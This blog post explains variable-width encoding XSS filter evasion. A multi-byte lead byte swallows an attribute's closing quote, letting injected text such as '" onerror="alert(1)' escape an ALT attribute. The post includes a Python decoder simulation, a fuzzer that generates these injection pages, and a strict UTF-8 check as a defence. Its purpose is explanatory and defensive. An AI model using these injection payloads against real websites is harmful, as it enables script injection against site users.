Just when you thought it was safe to jump back into the web security development waters, something like this comes along. One of the things I’ve mentioned several times in my posts is that even once you figure out all this XSS stuff, you still need to make sure you have the proper encoding methods. My particular encoding method of choice is UTF-8. Then I read Cheng Peng Su’s explanation of variable-width encoding filter evasion and my world shook for a moment. Truly shook.
Previously there were certain things you could assume were safe. Like, let’s say, an ALT attribute in an image tag. The user should be allowed to enter anything they like in an ALT attribute, except the dreaded double quote that would jump them out of encapsulation. Well, the way multi-byte encodings work, several bytes are combined into one character. So if you butt a certain byte up against another, the pair renders as a single third character in the browser. Guess what: the browser accepts a double quote as the second byte of such a pair. So if you put the right leading byte up against a double quote, you turn that double quote into a meaningless third character, which keeps you encapsulated. Why is that good for the attacker? Because we DO allow double quotes outside of the tags, because we are nice people and we like it when people can quote things. When they put their own quote in after what we think is the end of the tag, that quote is the one that closes the attribute, so they have jumped out of the encapsulation while still sitting inside a valid HTML tag.
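To make the byte-swallowing concrete, here is a minimal Python sketch. It is a simulation under stated assumptions, not real browser code: `lenient_decode`, `alt_value` and `build_page` are hypothetical helpers I made up for illustration, and the lenient decoder simply assumes that any byte from 0xC0 to 0xFD eats exactly one following byte. It compares what a byte-level filter sees with what such a browser would see.

```python
def lenient_decode(data: bytes) -> str:
    """Simulate a decoder that trusts any lead byte and swallows the next byte.

    Assumption: a stand-in for the behaviour described above, not browser code.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xFD and i + 1 < len(data):
            out.append("\ufffd")  # lead byte + next byte collapse into one junk char
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def alt_value(html: str) -> str:
    """Return the text between alt=" and the next double quote."""
    start = html.index('alt="') + len('alt="')
    return html[start:html.index('"', start)]


def build_page(alt: bytes, comment: bytes) -> bytes:
    """Hypothetical template: user-supplied ALT text, then a user comment."""
    return b'<img src="a.gif" alt="' + alt + b'"> ' + comment


# The ALT field holds a lone lead byte; the comment field holds the attacker's quote.
page = build_page(b"\xc0", b'" onerror="alert(1)')

filter_view = page.decode("latin-1")  # one character per byte, like a naive filter
browser_view = lenient_decode(page)   # closing quote swallowed by the lead byte

print(repr(alt_value(filter_view)))   # ALT ends where the template intended
print(repr(alt_value(browser_view)))  # ALT runs on into the comment field

# A strict UTF-8 decoder refuses the same bytes outright.
try:
    page.decode("utf-8")
    strict_ok = True
except UnicodeDecodeError:
    strict_ok = False
print("strict decode accepted the page:", strict_ok)
```

In the browser view the ALT value no longer ends at the template's closing quote, so the quote supplied in the comment field is the one that closes it, and whatever follows is parsed as attributes of the image tag.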
It’s all very confusing, so I should probably give you an example. Click here in Internet Explorer. Excuse all the alert boxes, but they will show you which characters work for this. It should also be noted that you don’t actually need the end angle bracket if you start another quote. Leaving it off just messes up the HTML, so for the purpose of the fuzzer output I had to put it in to keep it readable. It appears that byte values 192-253 and 255 all act as suitable leading bytes to jump out of quotes in UTF-8. As Cheng points out, this is not limited to just UTF-8, but also applies to GB2312, GB18030, BIG5, EUC-KR, EUC-JP, and SHIFT_JIS, although I think UTF-8 is by far the worst offender because of its prevalence, even if it only affects Internet Explorer. There’s a lot more research to be done here, with other chars and other encoding methods, but this is a fantastic start.
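For anyone who wants to repeat this kind of test against their own pages, a fuzzer along these lines can be sketched in a few lines of Python. This is my own rough reconstruction, not the fuzzer behind the link above: the function names, the `x` attribute and the page layout are all assumptions. Each case puts one candidate byte directly before the closing quote of an ALT attribute and labels its alert with the byte value, so any alert box that fires tells you which byte swallowed the quote.

```python
def build_fuzz_cases(candidates=range(0x80, 0x100)):
    """Return one raw-bytes test case per candidate lead byte (hypothetical layout)."""
    prefix = b'<img src="" alt="'
    # If the candidate byte swallows the quote after it, the next quote ends the
    # ALT value and onerror becomes a live attribute. The trailing '>' is kept
    # only so the output stays readable when nothing is swallowed.
    suffix_template = '"> " onerror="alert({})" x="">\n'
    cases = []
    for value in candidates:
        lead = bytes([value])
        cases.append(prefix + lead + suffix_template.format(value).encode("ascii"))
    return cases


def build_fuzz_page(cases, charset="utf-8"):
    """Wrap the cases in a page that declares the charset under test."""
    head = (
        '<html><head><meta http-equiv="Content-Type" '
        'content="text/html; charset={}"></head><body>\n'.format(charset)
    ).encode("ascii")
    return head + b"".join(cases) + b"</body></html>\n"


cases = build_fuzz_cases()
page = build_fuzz_page(cases)
print(len(cases), "cases,", len(page), "bytes")
```

The page has to be written out and served as raw bytes (for example by opening the file in binary mode), because encoding it through a normal text API would replace the lone bytes with valid sequences and defeat the test. Changing the `charset` argument is one way to try the other encodings Cheng lists, although their lead-byte ranges differ.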
This is a very scary and very real exploit for any site that allows things like images with additional ALT parameters or inline style attributes of any kind. This could have impacts all over the place. I will be curious to see how this plays out with the search engines (what encodings they are vulnerable to, if any) for the blackhat SEO world. I applaud Cheng for finding this. It’s very easy to exploit if you know what you’re doing and very difficult to prevent.
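One partial defence worth sketching, assuming your application receives user input as raw bytes and serves its pages as UTF-8, is to refuse anything that is not well-formed UTF-8 before it ever reaches a template. The helper name `is_well_formed_utf8` is hypothetical, and this does not replace proper output escaping or cover the other encodings listed above. It only closes the specific hole where a stray lead byte sits right before a quote.

```python
def is_well_formed_utf8(raw: bytes) -> bool:
    """Return True only if `raw` decodes cleanly under a strict UTF-8 decoder."""
    try:
        raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return False
    return True


samples = {
    "plain ascii": b"a nice picture",
    "valid two-byte char": b"caf\xc3\xa9",
    "lone lead byte": b"\xc0",
    "lead byte before quote": b'\xe4"',
}

for label, raw in samples.items():
    print(label, "->", "accept" if is_well_formed_utf8(raw) else "reject")
```

Python's built-in decoder is strict about lead and continuation bytes, so a lone lead byte or a lead byte followed by a double quote is rejected rather than silently merged.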